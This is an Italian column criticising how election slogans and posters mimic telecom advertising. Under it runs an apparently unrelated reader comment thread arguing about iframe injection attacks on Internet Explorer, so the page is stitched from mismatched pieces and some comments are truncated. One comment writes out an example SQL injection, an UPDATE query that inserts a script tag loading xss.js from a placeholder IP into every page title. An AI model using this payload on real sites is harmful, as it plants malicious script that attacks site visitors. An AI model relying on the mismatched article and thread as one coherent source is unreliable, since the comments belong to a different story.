Cassandra Crossing/ Glossario Elettorale: Slogan & Manifesti

Manifesti politici che si insinuano nella mente dei consumatori, claim studiati ad arte per colpire l'elettorato. La campagna elettorale come le offerte promozionali di operatori telefonici e ISP

Roma – L’ultima settimana ha visto la chiusura delle liste e l’inizio della campagna elettorale vera e propria, per ora limitata ad alcune stoccate di assaggio e senza combattimenti veri e propri. Abuserò perciò oggi a fondo della pazienza dei miei undici lettori con una serie di ragionamenti generali di tipo qualunquistico . La connotazione negativa di questo termine può essere parecchio stemperata da una lettura della breve storia del movimento dell'” Uomo Qualunque “. Anche il significato di questa parola, come di altre di cui ci siamo già occupati qui (senza voler estendere il parallelo in nessun modo), è stato ridefinito fino ad assumere il significato odierno, incondizionatamente negativo.

Ma torniamo all’argomento del titolo. Da qualche elezione il manifesto elettorale pare essere diventato, come lo è stato in tempi passati, un veicolo importante per far giungere i messaggi politici. Un vecchio medium riscoperto, insomma. D’altra parte il manifesto dei cosacchi che si abbeverano nella acquasantiere di piazza S. Pietro lo conoscono anche coloro che non lo hanno mai visto.

I dibattiti televisivi vedono (finalmente) un comportamento quasi civile tra i partecipanti, che però continuano a parlare di questioni di principio e a sciorinare numeri solo durante la citazione di sondaggi. Proposte reali, verificabili, misurabili: zero (almeno per quello che ho avuto modo di vedere). La dialettica in atto pare quindi limitata (per ora?) a dichiarazioni di principio e proclami, e questo si percepisce meglio nei manifesti e negli slogan che nei dibattiti.

Ricordate quando sul mercato italiano sono arrivati uno dopo l’altro i gestori di telefonia mobile? Per imporsi sul mercato hanno dovuto creare delle icone che li rappresentassero e li distinguessero. Il risultato fu la creazione di una icona sensuale (vi viene in mente qualcuno, anzi qualcuna?) da parte di Omnitel, di un’icona giovanile, amichevole e spiritosa da parte di Tim e di una icona infantile, pura ed innocua da parte di Blu.
Sarà un caso, ma l’ultima è quella che è durata di meno e la prima è quella che ricordano tutti; forse un esempio di “chi prima arriva….”? L’evoluzione dei messaggi pubblicitari e delle offerte reali verso gli utenti è continuata in questo senso: tanti effetti speciali e pochi fatti.

Da una parte pubblicità sempre più “gridate”, sempre più martellanti, sempre più piene di star, sempre più costose, sempre più vuote di ogni informazione, sempre più piene di distorsioni volte a ghermire nuovi clienti con messaggi oltre il limite della correttezza commerciale, tanto che la pur lenta e poco incisiva Autorità Garante è dovuta ricorrere spesso a (tardive e leggerissime) sanzioni.

Dal lato opposto offerte commerciali sempre più illeggibili e poco decodificabili, con tariffe complesse e poco chiare, comunque molto care rispetto alla media europea, e che costringono l’utente a gimcane intellettuali ed a continue attenzioni per non lasciarsi fregare prendere troppi soldi. Offerta variegata e ricca, potrebbero dire le aziende interessate. Mancanza di offerte chiare e propagandate con i fatti e non con acchiappacitrulli, ribatterei piuttosto io.

Non ci sono stati cambiamenti, anzi questo andazzo si è esteso anche all’offerta di banda larga e di servizi IP. In sintesi: nessuna considerazione e nessun rispetto del consumatore, visto solo come pollo decerebrato da spennare e difeso da nessuno.

Ma non stavamo parlando di politica? Certamente, infatti il “sapore” che questo inizio di campagna elettorale mi ha fatto sentire è esattamente lo stesso. Tramite i primi interventi c’è chi ha sposato la “sicurezza” come messaggio primario, costringendo tutti gli altri a distinguo artificiosi, ed a slogan che evidenziano la solidità e l'”alleanza”. È curioso, ma forse perfettamente naturale se pensiamo alla caratterizzazione del provider di telefonia mobile, che siano proprio i partiti più piccoli a muoversi per primi ed occupare valenze simboliche per cercare una identità mediatica e contemporaneamente renderla parzialmente o totalmente indisponibile alla concorrenza.

Volendo continuare con l’analogia telefonica, possiamo vedere come cavalli di battaglia popolari ma scomodi, difficili da gestire e forieri di autogol quali “lotta alla pedofilia” o “difesa della vita” vengano strumentalizzati dai partiti maggiori, con reciproche invasioni di campo ma per ora in sordina, come per effettuare un sondaggio e vedere le reazioni della gente.
Chi invece non conta solo sulla creazione di una pur artificiale identità mediatica ma sulla forza ritarda le prese di posizione, si muove tatticamente contando su un robusto schieramento di artiglieria pesante e pensando al confronto finale con il vero avversario.

In tutto questo i programmi cosa sono diventati?
Dieci righe di slogan?
Duecento pagine fitte di tuttologia (slogan lunghi)?

In realtà i programmi elettorali in Italia contano meno di una giusta quantità di capelli, importantissimi per l’immagine di un candidato, che qualche volta si materializzano addirittura passando da Photoshop e dai manifesti al mondo reale. Dove stanno le cose necessarie e verificabili nei programmi? Le prese di posizione chiare, i diritti civili, la difesa della legalità, una “cultura del fare” contrapposta ad una cultura “del dire” che per i politici si traduce in una “dell’apparire” perché è quella che (grazie a noi) li premia.

In molti punti pubblicità e l’attuale propaganda politica sono equivalenti. La pubblicità funziona non perché istupidisce gente intelligente. Funziona perché fa scattare condizionamenti ed automatismi quando non siamo attenti, quando siamo pigri, annoiati, come spesso accade tra gli scaffali di un supermercato o davanti alla televisione.

Assistiamo ad un dibattito politico fatto non di programmi realizzabili ma di slogan elettorali; testi e figure in quadricromia pieni di immagini apocalittiche o di paradisi tropicali, di massimi sistemi e di massimalismi.

Non servono biglietti per un atollo tropicale, o poter spedire 10mila SMS gratuiti il 29 febbraio; ci servono autobus economici, puliti, dignitosi e senza borseggiatori, che facciano lasciare l’auto a casa, con biglietti privi di RFID gabellati per un migliore servizio agli utenti. Serve poter telefonare o mandare mail a tariffe europee senza dover perdere ore a leggere contratti e temere di aprire la bolletta, senza essere schiavi dei fornitori di servizi ma piuttosto utenti con possibilità di scelta.

Serve una politica piccola e fattiva, di cose minute, verificabili e verificate dagli elettori.

Altrimenti basta politica, “Totti for president”, MMS gratuiti per tutti a vita e via così.

Ma per dove?

Marco Calamari

Tutte le release di Cassandra Crossing sono disponibili a questo indirizzo

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Cassio scrive:
    Usare firefox no eh!
    Cdo, in Firefox gli ActiveCess non ci sono!Usate internet explorer intanto... bravi ;)
  • Andrea scrive:
    Soluzione
    Linux o Mac e il problema è risolto!
  • MircoM scrive:
    Re: Anche i siti di Trend Micro...
    cito dal link:none of Trend Micro's customers would have been affected by visiting the company's sites, as the vendor detects iFrame attacks.ecco cosa si intende per "marketing virale" :D
  • Renji Abarai scrive:
    Solito virus al carbonio.
    Perchè con IE7 quando navigo mi scrive: è stato rilevata l'installazione di un componente "tot.XYZ" continuare o no?Se poi clicchi non è colpa di IE o chi per lui.
    • Anonimo scrive:
      Re: Solito virus al carbonio.
      - Scritto da: Renji Abarai
      Perchè con IE7 quando navigo mi scrive: è stato
      rilevata l'installazione di un componente
      "tot.XYZ" continuare o
      no?
      Se poi clicchi non è colpa di IE o chi per lui.Sono perfettamente d'accordo.
    • MircoM scrive:
      Re: Solito virus al carbonio.
      purtroppo contro l'utonto (TM) non c'è nulla di perfettamente sicuro :)
  • mirko mirko scrive:
    quali giochi?
    ma come si vede se sei stato reindirizzato su questo server e poi volevo sapere se è attiva questa cosa mache su www.imperiaonline.org
  • sylvaticus scrive:
    Ma qual'è la vulnerabilità lato server??
    La portata così grande di infezione nei siti in così poco tempo mi fa pensare all'exploit di una vulnerabilità trovato su qualche famoso CMS e quindi sfruttata su più siti.. l'articolo omette però di rilevare quale questo sia....
    • Mik scrive:
      Re: Ma qual'è la vulnerabilità lato server??
      - Scritto da: sylvaticus
      La portata così grande di infezione nei siti in
      così poco tempo mi fa pensare all'exploit di una
      vulnerabilità trovato su qualche famoso CMS e
      quindi sfruttata su più siti.. l'articolo omette
      però di rilevare quale questo
      sia....http://www.google.it/search?hl=it&q=XSS
      • rotfl scrive:
        Re: Ma qual'è la vulnerabilità lato server??
        - Scritto da: Mik
        - Scritto da: sylvaticus

        La portata così grande di infezione nei siti in

        così poco tempo mi fa pensare all'exploit di una

        vulnerabilità trovato su qualche famoso CMS e

        quindi sfruttata su più siti.. l'articolo omette

        però di rilevare quale questo

        sia....

        http://www.google.it/search?hl=it&q=XSSSei ridicolo. Finiscila di parlare a vanvera che ne abbiamo le tasche piene, buffone.
        • Mik scrive:
          Re: Ma qual'è la vulnerabilità lato server??
          - Scritto da: rotfl
          - Scritto da: Mik

          - Scritto da: sylvaticus


          La portata così grande di infezione nei siti
          in


          così poco tempo mi fa pensare all'exploit di
          una


          vulnerabilità trovato su qualche famoso CMS e


          quindi sfruttata su più siti.. l'articolo
          omette


          però di rilevare quale questo


          sia....



          http://www.google.it/search?hl=it&q=XSS

          Sei ridicolo. Finiscila di parlare a vanvera che
          ne abbiamo le tasche piene,
          buffone.zoticone ignorante!
          • rotfl scrive:
            Re: Ma qual'è la vulnerabilità lato server??
            - Scritto da: Mik

            Sei ridicolo. Finiscila di parlare a vanvera che

            ne abbiamo le tasche piene,

            buffone.

            zoticone ignorante!Almeno IO non parlo di argomenti che non conosco assolutamente, come invece fai tu. Mi spieghi cosa c'entra il Cross Site Scripting con la compromissione di un web server, eh? Hai idea almeno di COSA sia il cross site scripting? Guarda che io per anni ho fatto penetration testing su applicazioni web, e che di questi attacchi ne vedo tutti i giorni dato che in questo lavoro su sandbox che il malware installato da exploit tramite iframe lo raccolgono tutti i giorni. E' grazie a gente incompetente, arrogante e senza la minima cognizione di causa come te che questo forum sta diventando illeggibile.
      • rotfl scrive:
        Re: Ma qual'è la vulnerabilità lato server??
        - Scritto da: Mik
        - Scritto da: sylvaticus

        La portata così grande di infezione nei siti in

        così poco tempo mi fa pensare all'exploit di una

        vulnerabilità trovato su qualche famoso CMS e

        quindi sfruttata su più siti.. l'articolo omette

        però di rilevare quale questo

        sia....

        http://www.google.it/search?hl=it&q=XSSROTFL... Certo, come no. XSS che infetta webserver. Invece sul sito del SANS, chissa' come mai, dice:[b]Protecting Webservers:Until details become available on how the iframe was injected, we have no recommendations[/b]Perche' non glielo comunichi tu che cio' che ha infettato i server e' un attacco lato client... (rotfl) Sai le risate...
        • rotfl scrive:
          Re: Ma qual'è la vulnerabilità lato server??
          - Scritto da: rotfl
          - Scritto da: Mik

          - Scritto da: sylvaticus


          La portata così grande di infezione nei siti
          in


          così poco tempo mi fa pensare all'exploit di
          una


          vulnerabilità trovato su qualche famoso CMS e


          quindi sfruttata su più siti.. l'articolo
          omette


          però di rilevare quale questo


          sia....



          http://www.google.it/search?hl=it&q=XSS

          ROTFL... Certo, come no. XSS che infetta
          webserver. Invece sul sito del SANS, chissa' come
          mai,
          dice:

          Protecting Webservers:

          Until details become available on how the iframe
          was injected, we have no
          recommendations

          Perche' non glielo comunichi tu che cio' che ha
          infettato i server e' un attacco lato client...
          (rotfl) Sai le
          risate...http://isc.sans.org/diary.html?storyid=4139
          • Mik scrive:
            Re: Ma qual'è la vulnerabilità lato server??
            - Scritto da: rotfl
            - Scritto da: rotfl

            - Scritto da: Mik


            - Scritto da: sylvaticus



            La portata così grande di infezione nei siti

            in



            così poco tempo mi fa pensare all'exploit di

            una



            vulnerabilità trovato su qualche famoso CMS
            e



            quindi sfruttata su più siti.. l'articolo

            omette



            però di rilevare quale questo



            sia....





            http://www.google.it/search?hl=it&q=XSS



            ROTFL... Certo, come no. XSS che infetta

            webserver. Invece sul sito del SANS, chissa'
            come

            mai,

            dice:



            Protecting Webservers:



            Until details become available on how the iframe

            was injected, we have no

            recommendations



            Perche' non glielo comunichi tu che cio' che ha

            infettato i server e' un attacco lato client...

            (rotfl) Sai le

            risate...

            http://isc.sans.org/diary.html?storyid=4139XSS è lato client, e c'è, basta guardare l'immagine dell'articolo, è quel js che crea gli iframe ecc.il codice XSS può essere stato iniettato in tante maniereo con una sql injenction sul dboppure scrivendo contenuti tramite il browserecc.è proprio vero "il riso abbonda sulla bocca degli stolti"e nel tuo caso "e maleducati"!
          • rotfl scrive:
            Re: Ma qual'è la vulnerabilità lato server??
            - Scritto da: Mik

            il codice XSS può essere stato iniettato in tante
            maniereCerto, e pero' in questo caso non e' XSS...
            o con una sql injenction sul db
            oppure scrivendo contenuti tramite il browser
            ecc.Forse non t'e' chiaro un concetto oltremodo semplice: i contenuti in un iframe che punta ad un sito esterno vengono SEMPRE caricati dai browser (a meno che non vi siano delle restrizioni/filtri, che di default non ci sono in nessuno dei maggiori browser). Pertanto se l'iframe e' stato inserito con una SQL injection nel DB (e non c'e' nulla che dimostri che quello sia stato il metodo d'attacco), non c'e' alcun cross-site scripting, e' semplicemente il browser che carica (giustamente) l'iframe esterno, che in questo caso e' maligno e contiene exploit, ma poteva anche contenere "ciao". Il punto e' che se anche l'iframe esterno conteneva "ciao" (senza alcuno script) rimane il fatto che i web server sono stati compromessi in qualche modo, e certo non con XSS essendo questo lato client. Potrebbe essere SQL injection, potrebbe essere una compromissione del web server, o qualsiasi tipo di accesso. Ma non e' XSS.
          • Mik scrive:
            Re: Ma qual'è la vulnerabilità lato server??

            Forse non t'e' chiaro un concetto oltremodo
            semplice: i contenuti in un iframe che punta ad
            un sito esterno vengono SEMPRE caricati dai
            browser (a meno che non vi siano delle
            restrizioni/filtri, che di default non ci sono in
            nessuno dei maggiori browser). Pertanto se
            l'iframe e' stato inserito con una SQL injection
            nel DB (e non c'e' nulla che dimostri che quello
            sia stato il metodo d'attacco), non c'e' alcun
            cross-site scripting, e' semplicemente il browser
            che carica (giustamente) l'iframe esterno, che in
            questo caso e' maligno e contiene exploit, ma
            poteva anche contenere "ciao". Il punto e' che se
            anche l'iframe esterno conteneva "ciao" (senza
            alcuno script) rimane il fatto che i web server
            sono stati compromessi in qualche modo, e certo
            non con XSS essendo questo lato client. Potrebbe
            essere SQL injection, potrebbe essere una
            compromissione del web server, o qualsiasi tipo
            di accesso. Ma non e'
            XSS.prima dell'iframe viene caricato il JSl'ho già scritto: guarda l'immagine riportata nell'articolohttp://punto-informatico.it/punto/20080314/mcafee.jpgC'è un JS nel title, quindiun codice javascript maligno di un altro sito,il altre parole un CROSS SITE SCRIPTING, XSSi motivi per cui per un hacker è meglio iniettare un JS piuttosto che direttamente un iframe sono molteplici:1) scrivere o meglio ancora in formato numerico al posto di
          • rotfl scrive:
            Re: Ma qual'è la vulnerabilità lato server??
            - Scritto da: Mik
            prima dell'iframe viene caricato il JS
            l'ho già scritto: guarda l'immagine riportata
            nell'articolo

            http://punto-informatico.it/punto/20080314/mcafee.

            C'è un JS nel title, quindi
            un codice javascript maligno di un altro sito,
            il altre parole un CROSS SITE SCRIPTING, XSSMa cosa vai blaterando? Guarda che caricare un Javascript da un altro sito mica e' cross-site scripting? Secondo te se scrivo su un mio sito faccio cross-site scripting?!?!?! (rotfl)(rotfl)(rotfl)Bah, ci rinuncio... Evidentemente ti piace parlare di argomenti che non conosci affatto. Per la cronaca io con queste cose ci lavoro DA ANNI... ed e' veramente triste vedere gente come te... :(
          • Mik scrive:
            Re: Ma qual'è la vulnerabilità lato server??
            - Scritto da: rotfl
            - Scritto da: Mik


            prima dell'iframe viene caricato il JS

            l'ho già scritto: guarda l'immagine riportata

            nell'articolo




            http://punto-informatico.it/punto/20080314/mcafee.



            C'è un JS nel title, quindi

            un codice javascript maligno di un altro sito,

            il altre parole un CROSS SITE SCRIPTING, XSS

            Ma cosa vai blaterando? Guarda che caricare un
            Javascript da un altro sito mica e' cross-site
            scripting? Secondo te se scrivo src="http://punto-informatico.it/script.js"
            su
            un mio sito faccio cross-site scripting?!?!?!
            (rotfl)(rotfl)(rotfl)

            Bah, ci rinuncio... Evidentemente ti piace
            parlare di argomenti che non conosci affatto. Per
            la cronaca io con queste cose ci lavoro DA
            ANNI... ed e' veramente triste vedere gente come
            te...
            :(invece e' veramente triste, e anche preoccupante, che persone che lavorano da anni su queste cose siano così ignoranti sull'argomentoLEGGI IL LABIALESe tu metti nel tuo sito: non è XSS perché:1) l'hai messo TU nel TUO sito2) script.js non è un malwareperché sia XSS occorrono tre condizioni:1) c'è un codice javascript (o vbscript, o flash o qualsiasi altro codice eseguito lato client) inserito all'interno di una pagina web2) questo codice non l'hai messo tu nella tua pagina web, ma una terza persona a tua insaputa3) questo codice è stato programmato per causare dannioccorrono tutte e TRE le condizioni, non ne basta una!analogamente tutti i virus sono degli eseguibili, ma non tutti gli eseguibili sono virus, perché i virus sono un sottoinsieme degli eseguibiliripassati la teoria degli insiemi che dovresti aver studiato alle elementari.
  • saxpax scrive:
    Problema solo per Microsoft.
    Ma siccome Microsoft rappresenta la maggioranza, è un problema serio è grosso.
    • Ios scrive:
      Re: Problema solo per Microsoft.
      - Scritto da: saxpax
      Ma siccome Microsoft rappresenta la maggioranza,
      è un problema serio è
      grosso.Tanto il mac o linux io non li utilizzerò mai.
  • Mik scrive:
    XSS
    non copiate il gergo per utonti dai tg e dalle testate tradizionali, qui c'è un pubblico di + o - esperti, e questi attacchi hanno un nome: XSS
    • Bill scrive:
      Re: XSS
      - Scritto da: Mik
      non copiate il gergo per utonti dai tg e dalle
      testate tradizionali, qui c'è un pubblico di + o
      - esperti, e questi attacchi hanno un nome:
      XSSAzz, abbiamo un caker in carne e ossa...
    • Lemon scrive:
      Re: XSS
      - Scritto da: Mik
      non copiate il gergo per utonti dai tg e dalle
      testate tradizionali, qui c'è un pubblico di + o
      - esperti, e questi attacchi hanno un nome:
      XSSLascia perdere, quando c'è scritto activex e IE è già sufficiente, sta poi al lettore informarsi se vuole capire qualcosa di più.
      • Mik scrive:
        Re: XSS
        - Scritto da: Lemon
        - Scritto da: Mik

        non copiate il gergo per utonti dai tg e dalle

        testate tradizionali, qui c'è un pubblico di + o

        - esperti, e questi attacchi hanno un nome:

        XSS

        Lascia perdere, quando c'è scritto activex e IE è
        già sufficiente, sta poi al lettore informarsi se
        vuole capire qualcosa di
        più.si ma se al lettore non gli metti la parola chiave da cercare sui motori di ricerca, ma un generico "codice malevolo" poi chi non sa non può nemmeno informarsiriguardo a IE, smettiamola con sta leggenda, firefox è bacato quanto IE, e a parte i bachi pure in una estensione per firefox ci posso mettere del codice malevolo (spyware) che x esempio ti ruba tutte le password di tutti i siti che visitise continuiamo a dire che firefox è sicuro poi induciamo tutti a fidarsi sia del browser che di tutti i suoi plugin/estensioni, cioé aumentiamo al massimo la sua vulnerabilità
        • vac scrive:
          Re: XSS
          Sicuro? no.E molto più sicuro non significa sicuro al 100%Una cosa è avere dei buchi, un'altra è cercare in siti non ufficiali delle estensioni con dei buchi.Morale: il cervello non te lo sostituisce nessuno
          • Mik scrive:
            Re: XSS
            - Scritto da: vac
            Sicuro? no.
            E molto più sicuro non significa sicuro al 100%

            Una cosa è avere dei buchi, un'altra è cercare in
            siti non ufficiali delle estensioni con dei
            buchi.

            Morale: il cervello non te lo sostituisce nessunoma quanto siamo indietro ...uno spyware non è un baco!e posso farti installare un estensione per firefox molto più facilmente che un activex per IE
          • krane scrive:
            Re: XSS
            - Scritto da: Mik
            - Scritto da: vac

            Sicuro? no.

            E molto più sicuro non significa sicuro al 100%

            Una cosa è avere dei buchi, un'altra è cercare

            in siti non ufficiali delle estensioni con dei

            buchi.

            Morale: il cervello non te lo sostituisce

            nessuno
            ma quanto siamo indietro ...
            uno spyware non è un baco!
            e posso farti installare un estensione per
            firefox molto più facilmente che un activex per
            IEOk, proviamo... Facci installare l'estensione (rotfl)
          • rotfl scrive:
            Re: XSS
            - Scritto da: Mik
            e posso farti installare un estensione per
            firefox molto più facilmente che un activex per
            IE(rotfl)(rotfl)
    • rotfl scrive:
      Re: XSS
      - Scritto da: Mik
      non copiate il gergo per utonti dai tg e dalle
      testate tradizionali, qui c'è un pubblico di + o
      - esperti, e questi attacchi hanno un nome:
      XSSComplimenti, non hai capito assolutamente NIENTE. :$XSS (che poi sarebbe "Cross Site Scripting") non c'entra assolutamente una mazza con questo attacco, qui hanno bucato dei server (in un modo non descritto, quindi potrebbe essere qualsiasi cosa da un baco del web server a credenziali ftp rubate) e hanno incluso nelle pagine web un iframe che punta ad un server che contiene degli exploit contro IE. Dov'e' l'XSS?
      • Mik scrive:
        Re: XSS
        - Scritto da: rotfl
        - Scritto da: Mik

        non copiate il gergo per utonti dai tg e dalle

        testate tradizionali, qui c'è un pubblico di + o

        - esperti, e questi attacchi hanno un nome:

        XSS

        Complimenti, non hai capito assolutamente NIENTE.

        :$

        XSS (che poi sarebbe "Cross Site Scripting") non
        c'entra assolutamente una mazza con questo
        attacco, qui hanno bucato dei server (in un modo
        non descritto, quindi potrebbe essere qualsiasi
        cosa da un baco del web server a credenziali ftp
        rubate) e hanno incluso nelle pagine web un
        iframe che punta ad un server che contiene degli
        exploit contro IE. Dov'e'
        l'XSS?E' esattamente quello che si può fare con XSS,e magari l'xss l'hanno ralizzata con una sql injenction, ... comunque è inutile che ti spieghi, non ci arriveresti
        • rotfl scrive:
          Re: XSS
          - Scritto da: Mik
          E' esattamente quello che si può fare con XSSMa per favore... Il Cross Site scripting non puo' compromettere un web server... il cross site scripting e' appunto lo sfruttamento degli script (che sono CLIENT-SIDE, no server-side), solitamente per "rubare" il cookie per l'autenticazione ad un'applicazione web.
          e magari l'xss l'hanno ralizzata con una sql
          injenction, ...Ma finiscila per piacere... basta!!! "XSS realizzata con una sql injenction"!?!! (rotfl)... Ma ti rendi conto di cosa scrivi?
          comunque è inutile che ti spieghi, non ci
          arriverestiAh grazie, detto da un ignorante e' un complimento.
          • Mik scrive:
            Re: XSS

            Ma per favore... Il Cross Site scripting non puo'
            compromettere un web server... il cross site
            scripting e' appunto lo sfruttamento degli script
            (che sono CLIENT-SIDE, no server-side),
            solitamente per "rubare" il cookie per
            l'autenticazione ad un'applicazione
            web.


            e magari l'xss l'hanno ralizzata con una sql

            injenction, ...

            Ma finiscila per piacere... basta!!! "XSS
            realizzata con una sql injenction"!?!! (rotfl)...
            Ma ti rendi conto di cosa
            scrivi?


            comunque è inutile che ti spieghi, non ci

            arriveresti

            Ah grazie, detto da un ignorante e' un
            complimento.CORSO RAPIDO DI XSS + SQL INJENCTIONper un ignorante (non capisce nulla ed è convinto di sapere) e zoticone (offende in maniera scurile se non capisce)C'è un CMS con il suo bel DB, nel quale c'è una tabella CONTENUTI con le seguenti colonne:IDTITOLOCONTENUTOl'hacker realizza un attacco SQL INJENCTION facendo girare lato server, usando solo il browser (sento già le risate del zoticone ignorante, poverino, lui crede che per bucare un server serve la password ftp)la query:UPDATE CONTENUTI SET TITOLO=TITOLO+' 'Se il sito oltre a non essere protetto dalla SQL INJENCTION, non lo è pure dagli attacchi XSS,tutte le pagine del sito ora avranno un titolo modificato,che sul browser apparirà come l'immagine nell'articolo,mentre nel sorgente sarà circa così: DEMO PER ZOTICONE IGNORANTE ...in pratica quando viene chiamata una pagina così infettata, entrera in esecuzione sul browser il file javascript XSS.js, il quale creerà un iframe nascosto, e all'interno di questo iframe c'è il codice HTML che richiama un video di realplayer con una sintassi tale da sfruttarne una vulnerabilità.
          • rotfl scrive:
            Re: XSS
            - Scritto da: Mik
            CORSO RAPIDO DI XSS + SQL INJENCTION

            per un ignorante (non capisce nulla ed è convinto
            di sapere) e zoticone (offende in maniera scurile
            se non
            capisce)

            C'è un CMS con il suo bel DB, nel quale c'è una
            tabella CONTENUTI con le seguenti
            colonne:
            ID
            TITOLO
            CONTENUTO

            l'hacker realizza un attacco SQL INJENCTION
            facendo girare lato server, usando solo il
            browser (sento già le risate del zoticone
            ignorante, poverino, lui crede che per bucare un
            server serve la password
            ftp)
            la query:

            UPDATE CONTENUTI SET TITOLO=TITOLO+' src="http://123.123.123.123/xss.js"
            '
            Se il sito oltre a non essere protetto dalla SQL
            INJENCTION, non lo è pure dagli attacchi
            XSS,
            tutte le pagine del sito ora avranno un titolo
            modificato,
            che sul browser apparirà come l'immagine
            nell'articolo,
            mentre nel sorgente sarà circa così:

            DEMO PER ZOTICONE
            IGNORANTE src="http://123.123.123.123/xss.js"

            in pratica quando viene chiamata una pagina così
            infettata, entrera in esecuzione sul browser il
            file javascript XSS.js, il quale creerà un iframe
            nascosto, e all'interno di questo iframe c'è il
            codice HTML che richiama un video di realplayer
            con una sintassi tale da sfruttarne una
            vulnerabilità.Come volevasi dimostrare, parli di cose che non sai ASSOLUTAMENTE.Quella che hai descritto tu e' una semplice SQL injection, non c'entra ASSOLUTAMENTE NULLA con il Cross Site Scripting, in quanto cio' che viene inserito dalla SQL injection (NB: "injection", non "injenction") e' un semplice contenuto html. Infatti, non c'e' alcuno scripting, se il contenuto del DB e' stato modificato da una SQL injection semplicemente l'applicazione web carica cio' che c'e' nel DB, in questo caso un iframe maligno.La SQL injection potrebbe inserire allo stesso modo invece di uno script tutto cio' che c'e' su www.evilsite.com viene caricato comunque senza che vi sia alcun "cross site scripting".Dai su, basta...
  • Lemon scrive:
    Gioco intelligente per bambini..
    1) Cos'è un iframe injection?2)Vengono colpiti i server web o i siti? dipende dal software installato?3) Quali browser visualizzano iframe? tutti? solo qualcuno?4) Si possono eseguire js presenti in iframe solo da IE o anche da altri browser?5) I js che vulnerabilità usano? e sono recenti o ampiamente patchate da tempo?A voi queste fatidiche domande....
  • daniele scrive:
    Ie, active x o quant'altro...
    Ok, il browser bacato è un problema, ma che vogliamo dire dei server che veicolano l'epidemia?Che Os e quale web server c'è installato sui server dove è stato installato il malmware?Perchè gli utenti saranno anche tonti e poco accorti, ma l'ultima cosa che si aspettano andando su un sito che conoscono è di beccarsi qualcosa..
    • MircoM scrive:
      Re: Ie, active x o quant'altro...
      (poche) altre informazioni le trovi quìhttp://isc.sans.org/diary.html?storyid=4139&rss"l'infezione" è la solita iFrame injection che va tanto di moda ultimamente.anche alla SANS non hanno informazioni precise sulla vulnerabilità che ha consentito l'ignezione degli iFrame, ma in generale non è nemmeno detto che dipenda dal SO.può benissimo essere una vulnerabilità di una applicazione web abbastanza diffusa, ad esempio.se interessa tieni sotto controllo il sito della sans.
  • stefano scrive:
    re:
    mai sentita una idiozia simile, solo chi veramente non cosa sia un server web, ma da crederci?
    • stefano scrive:
      Re: re:
      ..in ogni caso 10000 pagine web non dovrebbero fare notizia, è come dire : ATTENZIONE! PRENDERE L'AEREO E' PERICOLOSO PERCHE' IERI E' CADUTO UN PIPER!!
  • Anonimo scrive:
    Evidenziare il browser, please!
    Mi aaspetterei che almeno su P.I. si facesse dell'informazione tecnica precisa e non allarmistica.Mi sta bene che al TGCOM dicano che un nuovo virus attacca indistintamente tutti i computer. Ma da P.I. mi aspetterei che la notizia dica: "Un nuovo script attacca tutti i computer con sistema operativo windows (versione) i cui utenti sono stati a visitare il sito (nome sito) col browser (nome browser e versione). Gli utenti che usano FF o Opera non sono interessati dalla minaccia."
    • Maurus scrive:
      Re: Evidenziare il browser, please!
      Beh è un'allarme giusto avvisare che sono presenti delle rotture in internet. Ma i siti certamente non si possono elencare dato che probabilmente non si conoscono.Inoltre non è detto che il virus o quant'altro non siano acquisibili tramite firefox eseguito da windows.Non è da ritenersi un'allarmismo, ma un'avviso di un pericolo presente nel web
      • John Titor scrive:
        Re: Evidenziare il browser, please!
        - Scritto da: Maurus
        Inoltre non è detto che il virus o quant'altro
        non siano acquisibili tramite firefox eseguito da
        windows.Firefox non usa gli activeX, quindi se effettivamente il pericolo deriva dagli activeX firefox non è conivolto e solo IE lo è
        • Mik scrive:
          Re: Evidenziare il browser, please!
          - Scritto da: John Titor
          - Scritto da: Maurus

          Inoltre non è detto che il virus o quant'altro

          non siano acquisibili tramite firefox eseguito
          da

          windows.

          Firefox non usa gli activeX, quindi se
          effettivamente il pericolo deriva dagli activeX
          firefox non è conivolto e solo IE lo
          èci vuole ben poco per modificare lo script affinché invece che tentare di installare un activeX (al quale l'utente deve dare conferma) cerchi di installare un estensione per firefox, nella quale chi l'ha creata può metterci di tutto.e chi da OK sull'installazione dell'activeX, azione complicata sulle ultime versioni di IE, darà OK anche al 3 2 1 istalla estensione di firefox.
          • krane scrive:
            Re: Evidenziare il browser, please!
            - Scritto da: Mik
            - Scritto da: John Titor

            - Scritto da: Maurus


            Inoltre non è detto che il virus o quant'altro


            non siano acquisibili tramite firefox eseguito


            da windows.

            Firefox non usa gli activeX, quindi se

            effettivamente il pericolo deriva dagli activeX

            firefox non è conivolto e solo IE lo

            è
            ci vuole ben poco per modificare lo script
            affinché invece che tentare di installare un
            activeX (al quale l'utente deve dare conferma)
            cerchi di installare un estensione per firefox,
            nella quale chi l'ha creata può metterci di
            tutto.Di siti che volessero installare activeX per motivi loro a me sconosciuti ne ho trovati tanti, ma se mi si apre il programmino che mi chiede se voglio installare un'estensione per firefox mi viene da chiedermi perche'...A te no ????
            e chi da OK sull'installazione dell'activeX,
            azione complicata sulle ultime versioni di IE,
            darà OK anche al 3 2 1 istalla estensione di
            firefox.No: e' una questione di abitudine: l'utente sa che un'estensione serve ad uno scopo definito e si chiede il perche'; questo non vale per gli activeX.Questo grazie alle pessime abitudini in cui ha indotto il passato di Explorer.
          • Mik scrive:
            Re: Evidenziare il browser, please!

            No: e' una questione di abitudine: l'utente sa
            che un'estensione serve ad uno scopo definito e
            si chiede il perche'; questo non vale per gli
            activeX.
            Questo grazie alle pessime abitudini in cui ha
            indotto il passato di
